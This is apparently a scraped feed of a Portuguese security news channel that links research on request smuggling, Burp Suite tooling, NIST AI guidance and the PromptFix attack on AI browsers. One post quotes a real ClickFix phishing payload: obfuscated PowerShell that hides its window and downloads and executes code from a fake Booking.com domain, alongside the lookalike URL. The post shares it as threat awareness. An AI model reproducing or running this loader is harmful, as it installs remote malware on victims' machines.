Conhece o PromptFix Attack?

Link para o texto da imagem: https://www.linkedin.com/posts/bruno-menozzi_a-nova-superf%C3%ADcie-de-ataque-n%C3%A3o-%C3%A9-seu-usu%C3%A1rio-activity-7365724038188490754-VRAf

Artigo sobre o PromptFix Attack: https://thehackernews.com/2025/08/experts-find-ai-browsers-can-be.html

Publicação do NIST sobre o novo framework: https://hackread.com/nist-concept-paper-ai-cybersecurity-framework/

Documento conceitual do NIST (PDF): https://csrc.nist.gov/pubs/cswp/29/the-way-forward/final/docs/sais-concept-paper_2025/08/14.pdf
Zeroc00i News & Tricks
Ohhh os caras hahaha. Criatividade sem limite sempre, impressionante http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Lembram do caractere que falamos esses dias sendo usado pra Phishing?
O John Hammond publicou um vídeo ha 3 horas falando sobre isso e outros caracteres parecidos que tem o mesmo comportamento:

https://youtu.be/nxVr4ERhrPQ?si=-Lbb1B2Qs8hNp4w9&t=609
Vocês podem usar essa acao customizada usando esse código aqui:
https://github.com/PortSwigger/bambdas/blob/main/CustomAction/RetryUntilSuccess.bambda
GitHub
bambdas/CustomAction/RetryUntilSuccess.bambda at main · PortSwigger/bambdas
bambdas/CustomAction/RetryUntilSuccess.bambda at main · PortSwigger/bambdas
Bambdas collection for Burp Suite Professional and Community. - PortSwigger/bambdas
Zeroc00i News & Tricks
Fim da live Fiz meu papel O James me mostrou o custom action na pratica hahaha, dahora e humilde
Sou um cara muito sonhador e isso faz meus dias ter um brilho um pouco a mais com coisas que podem parecer triviais para outras pessoas.

Nessa live eu mandei um comentario falando pro James que seria legal ter uma funcionaliade no Burp

Ele não só demonstrou ao vivo como ele implementaria, como agora publicou no repositório da Portswigger e agradeceu minha sugestão no linkedin. Muito dahora!
HTTP pipelining ou request smuggling?
Saiba como diferenciar:
https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
https://phrack.org/issues/72/3_md#scan
Vídeo que tô assistindo hoje, da época que o ManoelT fazia live com uma galera. É antigo, de 5 anos atrás, mas com certeza vale ainda (os conceitos se aplicam na atualidade).

https://www.youtube.com/watch?v=1RmBufOHkPo
YouTube
Conversa de Bug Bounty #2 - Fontes de Estudo
Vamos conversar mais uma vez sobre Bug Bounty, dessa vez nosso tema vai ser sobre fontes de estudo para atuar como um bug hunter. É uma conversa e portanto esperamos que você nos mande perguntas e comentários.
Fim da live
Fiz meu papel
O James me mostrou o custom action na pratica hahaha, dahora e humilde
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
Vai começar
https://github.com/aliasrobotics/cai

Não uso muito essas coisas prontas de IA, mas fiquei curioso sim. Alguem a fim de testar e dar um feedback se vale a pena?
GitHub
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
Cybersecurity AI (CAI), the framework for AI Security - aliasrobotics/cai
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
É hoje
Zeroc00i News & Tricks
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;" Ray ID: 3658b22362ef2157…
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;"                                                                                                                                                     Ray ID: 3658b22362ef2157 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="d1008b"
Página fake (reparem na URL):
Ohhh os caras hahaha. Criatividade sem limite sempre, impressionante

http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Esse vídeo saiu hoje e vai estar mt massa com certeza!
Principalmente depois daquela CVE da akamai que mencionamos aqui

https://www.youtube.com/watch?v=rr5VvMx4dT0
YouTube
Akamai's Ryan Barnett on WAFs, Unicode Confusables, and Triage Stories (Ep. 135)
Episode 135: In this episode of Critical Thinking - Bug Bounty Podcast Justin sits down with Ryan Barnett for a deep dive on WAFs. We also recap his Exploiting Unicode Normalization talk from DEFCON, and get his perspective on bug hunting from his time at…
Before
After
Back to Top